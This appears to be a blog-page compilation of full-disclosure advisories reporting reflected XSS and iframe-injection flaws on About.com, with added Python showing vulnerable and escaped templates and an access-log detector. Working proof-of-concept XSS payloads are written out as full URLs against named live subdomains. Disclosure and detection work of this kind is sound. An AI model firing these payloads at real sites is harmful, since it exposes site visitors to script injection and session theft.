<span style="font-family: Arial, Helvetica, sans-serif;">Several similar 0-day vulnerabilities in other products have been found by other bug hunters before, and CNN has patched some of them. "The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers' right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here!" A great many advisories on the following classes of web security issue have been published there: Injection, Broken Authentication and Session Management, Cross-Site Scripting (XSS), Insecure Direct Object References, Security Misconfiguration, Sensitive Data Exposure, Missing Function Level Access Control, Cross-Site Request Forgery (CSRF), Using Components with Known Vulnerabilities, and Unvalidated Redirects and Forwards. It also publishes suggestions, advisories and solution details related to XSS and URL redirection vulnerabilities, as well as cyber intelligence recommendations.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) About Group About.com All Topics (At least 99.88% links) Vulnerable to XSS (Cross-Site Scripting) Security Attacks</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://www.about.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.about.com/</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability description:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">A method was found to attack users of About.com with XSS attacks.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">All links under the topics of about.com can be used for this attack.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Just append "/lr/" to any About.com sub-domain, then append the script code, either directly or after any other path segments. The structure is "<a href="http://subdomain.about.com/lr/*/script_code/*">http://subdomain.about.com/lr/*/script_code/*</a>".</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerability can be exploited without user login. Tests were performed on Mozilla Firefox (26.0) in Ubuntu (14.04) and Microsoft IE (9.0.15) in Windows 7.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
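<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Added example, not code from this advisory or from About.com (whose server-side code is not public): a hypothetical reconstruction of the bug class described above, a request path interpolated raw into an HTML attribute, beside the same template with attribute-context escaping, and a small detector that flags the advisory's PoC shape in web-server access-log lines. It goes slightly beyond the text in that the detector also covers a payload carried in a query parameter and one that is URL-encoded twice. The host name is taken from the PoC URLs; the template and the log lines are constructed.</span></div>
</div>

```python
"""Reflected XSS via a URL path: a vulnerable template beside its hardened form,
plus a small access-log detector for the payload shape the advisory reports.

Added example for this advisory; it is not About.com's code, which is not
public.  `render_vulnerable` is a hypothetical reconstruction of the bug class
(request path interpolated raw into an HTML attribute), the host name is the
one from the advisory's PoC URLs, and the log lines below are constructed."""

import html
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# PoC string from the advisory: closes the attribute, then opens an element
# carrying an inline event handler.
POC_SUFFIX = '"><svg/onload=alert(/justqdjing/)>'
CLEAN_PATH = "/lr/ipad_how-tos/9033"


def render_vulnerable(path: str) -> str:
    """Hypothetical buggy template: the request path lands in href unescaped."""
    return f'<link rel="canonical" href="http://ipod.about.com{path}">'


def render_fixed(path: str) -> str:
    """Same template with escaping for an attribute context.
    quote=True turns " into &quot; so the payload cannot close the attribute."""
    return f'<link rel="canonical" href="http://ipod.about.com{html.escape(path, quote=True)}">'


class _TagCollector(HTMLParser):
    """Records every start tag and every on* attribute a browser-side parser
    would see; an extra element or handler means the input broke out."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.handlers: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [name for name, _ in attrs if name.startswith("on")]

    handle_startendtag = handle_starttag


def parse_markup(markup: str) -> tuple[list[str], list[str]]:
    """Return (start tags, on* attribute names) found in the rendered markup."""
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.tags, p.handlers


# --- detection over web-server access logs ---------------------------------

_REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# A tag opener followed by a letter, or an inline event-handler assignment,
# after URL-decoding.  Deliberately broad: it is a triage signal, not a WAF.
_XSS_SHAPE = re.compile(r"<\s*[a-z]|\bon[a-z]+\s*=", re.IGNORECASE)


def suspicious_requests(log_lines):
    """Yield (decoded target, matched fragment) for requests whose path or
    query decodes to markup.  Decodes twice so a double-encoded payload is
    not missed."""
    for line in log_lines:
        m = _REQUEST.search(line)
        if not m:
            continue
        decoded = unquote(unquote(m.group("target")))
        hit = _XSS_SHAPE.search(decoded)
        if hit:
            yield decoded, hit.group(0)


# Constructed sample log lines (combined log format).  The second line carries
# the advisory's PoC string URL-encoded once in the path; the fourth carries it
# URL-encoded twice in a query parameter.
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Feb/2015:10:00:00 +0000] "GET /lr/ipad_how-tos/9033 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [02/Feb/2015:10:00:07 +0000] "GET /lr/ipad_how-tos/9033%22%3E%3Csvg/onload=alert(/justqdjing/)%3E HTTP/1.1" 200 5160',
    '198.51.100.9 - - [02/Feb/2015:10:00:12 +0000] "GET /?q=googleandroidsystem HTTP/1.1" 200 8000',
    '198.51.100.9 - - [02/Feb/2015:10:00:15 +0000] "GET /?q=%2522%253E%253Csvg/onload%3Dalert(/justqdjing/)%253E HTTP/1.1" 200 8040',
]


if __name__ == "__main__":
    attacked = CLEAN_PATH + POC_SUFFIX
    print("vulnerable:", parse_markup(render_vulnerable(attacked)))
    print("fixed:     ", parse_markup(render_fixed(attacked)))
    for target, fragment in suspicious_requests(SAMPLE_LOG):
        print("suspicious request:", target, "matched", repr(fragment))
```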
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihLMeJ9WaQQA1UJyG4Jxf6D5b7I6PWZyKjoe2dhex3fL78N6ZQXR-fQgq_WLnY9kqembCj1muQq2yj4R2oQo1r7cUTC1Ss2z4rMDve_elQGaj4_qmkHYK9AhLfBkJFhXZzq6XZcO6UZhI/s1600/about_all_xss_1.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="251" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihLMeJ9WaQQA1UJyG4Jxf6D5b7I6PWZyKjoe2dhex3fL78N6ZQXR-fQgq_WLnY9kqembCj1muQq2yj4R2oQo1r7cUTC1Ss2z4rMDve_elQGaj4_qmkHYK9AhLfBkJFhXZzq6XZcO6UZhI/s400/about_all_xss_1.png" style="cursor: move;" width="400" /></span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUVUGURAaEGDT7TdXSTMZlso18uVA9ACDAfEVG0y89M-ChZvdEZDw92dtltwna8zB0qux9xYNnw8tQ4hLLSFG4C3PGoj5HyQmiDrudeXRwSB3L5ymYyUu8y-_-hGZhi7C7NXdQT5QMdJQ/s1600/about_all_xss_2.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="251" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUVUGURAaEGDT7TdXSTMZlso18uVA9ACDAfEVG0y89M-ChZvdEZDw92dtltwna8zB0qux9xYNnw8tQ4hLLSFG4C3PGoj5HyQmiDrudeXRwSB3L5ymYyUu8y-_-hGZhi7C7NXdQT5QMdJQ/s400/about_all_xss_2.png" style="cursor: move;" width="400" /></span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCxfAENvCDlL0T-Jb5pkRmpgojgYRK2QaSr7GYOmDYkZnYkWiuNpB2UjaWZA0WD-CmU1YEzob6AQMB5J8-juOUqP7nQ8cdb-rORAdD_btX8KfVIs2hBNb5fo2MeX0DW21647HSUo2hqvU/s1600/about_all_xss_4.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCxfAENvCDlL0T-Jb5pkRmpgojgYRK2QaSr7GYOmDYkZnYkWiuNpB2UjaWZA0WD-CmU1YEzob6AQMB5J8-juOUqP7nQ8cdb-rORAdD_btX8KfVIs2hBNb5fo2MeX0DW21647HSUo2hqvU/s400/about_all_xss_4.png" style="cursor: move;" width="400" /></a><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b>POC Codes, e.g.</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">/"><svg/onload=alert(/justqdjing/)></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ipod.about.com/lr/ipad_how-tos/9033" target="_blank">http://ipod.about.com/lr/ipad_how-tos/9033</a>"><svg/onload=alert(/justqdjing/)></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://bizfinance.about.com/lr/businesscredit/fl/5-Ways-to-Start-Establishing-Business-Identity-Theft-Protection.htm/" target="_blank">http://bizfinance.about.com/lr/businesscredit/fl/5-Ways-to-Start-Establishing-Business-Identity-Theft-Protection.htm/</a>"><svg/onload=alert(/justqdjing/)></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://recycling.about.com/lr/Collecting/ss/EPS-Recycling-5-Reasons-Why-and-2-Why-Not.htm/" target="_blank">http://recycling.about.com/lr/Collecting/ss/EPS-Recycling-5-Reasons-Why-and-2-Why-Not.htm/</a>"><svg/onload=alert(/justqdjing/)></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://dc.about.com/lr/shopping/a/BlkFriday.htm/" target="_blank">http://dc.about.com/lr/shopping/a/BlkFriday.htm/</a>"><svg/onload=alert(/justqdjing/)></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://healthtech.about.com/lr/Patient-Portals/fl/5-Ways-a-Patient-Portal-Can-Improve-Your-Health-Care-Experience.htm/" target="_blank">http://healthtech.about.com/lr/Patient-Portals/fl/5-Ways-a-Patient-Portal-Can-Improve-Your-Health-Care-Experience.htm/</a>"><svg/onload=alert(/justqdjing/)></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC Video:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<a href="https://www.youtube.com/watch?v=h5yELiJBxWo&feature=youtu.be"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=h5yELiJBxWo&feature=youtu.be</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Detail:</span></b></div>
</div>
<div style="margin: 0px;">
<a href="http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at_2.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at_2.html</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://tetraph.com/security/xss-vulnerability/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-xss-cross-site-scripting-security-attacks/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/xss-vulnerability/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-xss-cross-site-scripting-security-attacks/</span></a></div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(3) About Group About.com Main Page's Search Field XSS (Cross-Site Scripting) Security Vulnerabilities</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability description:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The About.com web application has a security vulnerability that can be exploited by XSS (Cross-Site Scripting) attacks.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The flaw is in the about.com main page's search field, whose "q" parameter is reflected into the page, e.g.</span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://www.about.com/?q=googleandroidsystem" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.about.com/?q=<wbr></wbr>googleandroidsystem</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfmIogi0-v6tS4kHSF59ECAhiUtdpSFt8bk1rQGSg-51vYYxKggzJp3zdKBCyewuclM8yVDZEbDgRtoXx9GrA6_NEjSmVrFPFofI2V8-01x7QJ0KrC75C_6QWzUkn7oC2oOu2FrJcwlEA/s1600/about_search_xss1.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfmIogi0-v6tS4kHSF59ECAhiUtdpSFt8bk1rQGSg-51vYYxKggzJp3zdKBCyewuclM8yVDZEbDgRtoXx9GrA6_NEjSmVrFPFofI2V8-01x7QJ0KrC75C_6QWzUkn7oC2oOu2FrJcwlEA/s400/about_search_xss1.png" style="cursor: move;" width="400" /></span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC Codes, e.g.</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"--/&gt;"&gt;&lt;img src=x onerror=prompt(/justqdjing/)&gt;</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.about.com/?q=" target="_blank">http://www.about.com/?q=</a>"--/&gt;"&gt;&lt;img src=x onerror=prompt(/justqdjing/)&gt;</span></div>
</div>
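<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">As an added illustration of the flaw class described above (example code written for this write-up, not About.com's own code, which is not public): a server-side template that reflects the "q" search parameter into an HTML attribute with no output encoding, beside the same template with attribute-context encoding. The template, the function names and the tag-count check are assumptions; the payload is the one from the POC codes above.</span></div>

```python
import html
from urllib.parse import parse_qs, urlsplit

# Payload from the advisory's POC section. It closes the value attribute and
# the input tag, then injects an img element whose onerror handler runs script.
POC_PAYLOAD = '"--/>"><img src=x onerror=prompt(/justqdjing/)>'


def search_param_from_url(url: str) -> str:
    """Return the "q" parameter of a search URL such as http://www.about.com/?q=...

    Mirrors what the server sees before it reflects the term back into the page.
    """
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("q", [""])[0]


def render_search_vulnerable(q: str) -> str:
    """Reflect the search term into the search box with no output encoding.

    Hypothetical template standing in for the flaw class the advisory describes;
    the real server-side code is not public.
    """
    return f'<input type="text" name="q" value="{q}">'


def render_search_fixed(q: str) -> str:
    """Same template, but the term is encoded for an HTML attribute context.

    html.escape(..., quote=True) turns &, <, >, " and ' into entities, so the
    term can neither terminate the attribute nor start a new tag.
    """
    return f'<input type="text" name="q" value="{html.escape(q, quote=True)}">'


def tag_count(rendered: str) -> int:
    """Number of '<' characters in the rendered fragment.

    The template contains exactly one tag, so anything above 1 means the
    search term broke out of the attribute and introduced its own markup.
    """
    return rendered.count("<")


if __name__ == "__main__":
    term = search_param_from_url("http://www.about.com/?q=" + POC_PAYLOAD)
    print("vulnerable:", render_search_vulnerable(term))
    print("fixed:     ", render_search_fixed(term))
```

<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The encoding has to match the context the value lands in: attribute-context escaping as above is not sufficient if the same term is also written into a script block or an event handler, which each need their own encoder.</span></div>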
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC Video:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<a href="https://www.youtube.com/watch?v=H4G7b_Jkqvw&feature=youtu.be"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=H4G7b_Jkqvw&feature=youtu.be</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://tetraph.com/security/xss-vulnerability/about-group-about-com-main-pages-search-field-xss-cross-site-scripting-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/xss-vulnerability/about-group-about-com-main-pages-search-field-xss-cross-site-scripting-security-vulnerabilities/</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/</span></a></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-main-pages-search.html">http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-main-pages-search.html</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(4) About Group About.com All Topics (At least 99.88% links) Vulnerable to Iframe Injection (Cross Frame Scripting) Security Attacks</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability description:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">About Group has a security vulnerability that can be exploited by Iframe Injection (Cross Frame Scripting) attacks.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerability is in about.com's "offsite.htm" page, which takes its destination from the "zu" parameter, e.g.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://internationalinvest.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//facebook.com/yahoo" target="_blank">http://internationalinvest.<wbr></wbr>about.com/gi/dynamic/offsite.<wbr></wbr>htm?zi=1/XJ/Ya&sdn=<wbr></wbr>internationalinvest&cdn=prep&<wbr></wbr>tm=2&f=21&tt=14&bt=0&bts=1&zu=<wbr></wbr>http%3A//facebook.com/yahoo</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Use "<a href="http://whitehatpost.blog.163.com/" target="_blank">http://whitehatpost.blog.163.<wbr></wbr>com/</a>" for the following test.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be exploited without user login. Tests were performed on Microsoft IE (10.0.9200.16750) on Windows 8, Mozilla Firefox (34.0) and Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) on Ubuntu (14.04), and Apple Safari 6.1.6 on Mac OS X Lion 10.7.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivIyPlx1PD170CZ3bJ6__OqWFwpCXt2wpG1SehmF1lDUD9KlgkIWehXSRMnBLGfRFeJkMXHb8_awYPdhJRvJAgAIqUohNnfAABx92xDqxT3Ob-qBjgu2v1-dej_k9ayG-JT-psTrnHtXk/s1600/about_inframe_injection.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivIyPlx1PD170CZ3bJ6__OqWFwpCXt2wpG1SehmF1lDUD9KlgkIWehXSRMnBLGfRFeJkMXHb8_awYPdhJRvJAgAIqUohNnfAABx92xDqxT3Ob-qBjgu2v1-dej_k9ayG-JT-psTrnHtXk/s400/about_inframe_injection.png" style="cursor: move;" width="400" /></span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1sH5EgDW5ocxdmLTy5CSukN96e1unBeV-l10D4l7aZD4v8tWayNXfH8V90NihgjrYNrtULXoa3Wl7Gb6guFJ_liLQFl2hbdlyWj7V2xHvlvGtwrz2i3HyDH6jXofZ-1rUEmUxL9Nku8s/s400/about_international_iframe_jnjection.png" style="cursor: move;" width="400" /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URLs:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://homerenovations.about.com/od/fundingyourrenovation/tp/8-Remodels-That-Maximize-Curb-Appeal-For-Higher-Selling-Price.htm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://homerenovations.about.<wbr></wbr>com/od/fundingyourrenovation/<wbr></wbr>tp/8-Remodels-That-Maximize-<wbr></wbr>Curb-Appeal-For-Higher-<wbr></wbr>Selling-Price.htm</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://publishing.about.com/od/Childrens-and-YA-Books/fl/A-Literary-linkedin-Agents-ebay-Advice-Hao123-to-Childrens-and-Bing-Sohu-YA-Dailymail-Authors-Snapdeal.htm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://publishing.about.com/<wbr></wbr>od/Childrens-and-YA-Books/fl/<wbr></wbr>A-Literary-linkedin-Agents-<wbr></wbr>ebay-Advice-Hao123-to-<wbr></wbr>Childrens-and-Bing-Sohu-YA-<wbr></wbr>Dailymail-Authors-Snapdeal.htm</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://chinesefood.about.com/od/chickenrecipes/tp/chicken-stir-fry-flipkart-adobe-alipay-pork-dropbox-blogger-github-jd-chinadaily-huffingtonpost-Livedoor-Buzzfeed-Themeforest-Godaddy.htm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://chinesefood.about.com/<wbr></wbr>od/chickenrecipes/tp/chicken-<wbr></wbr>stir-fry-flipkart-adobe-<wbr></wbr>alipay-pork-dropbox-blogger-<wbr></wbr>github-jd-chinadaily-<wbr></wbr>huffingtonpost-Livedoor-<wbr></wbr>Buzzfeed-Themeforest-Godaddy.<wbr></wbr>htm</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://menshair.about.com/od/facialhair/qt/growbeard-ask-360cn-mailru-gmw-googleleadservices-bbc-pornhub-peoplecn-rakuten-nicovideo-dailymotion-1-dmm-deviantart.htm/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://menshair.about.com/od/<wbr></wbr>facialhair/qt/growbeard-ask-<wbr></wbr>360cn-mailru-gmw-<wbr></wbr>googleleadservices-bbc-<wbr></wbr>pornhub-peoplecn-rakuten-<wbr></wbr>nicovideo-dailymotion-1-dmm-<wbr></wbr>deviantart.htm/</span></a></div>
</div>
<div>
<div style="margin: 0px;">
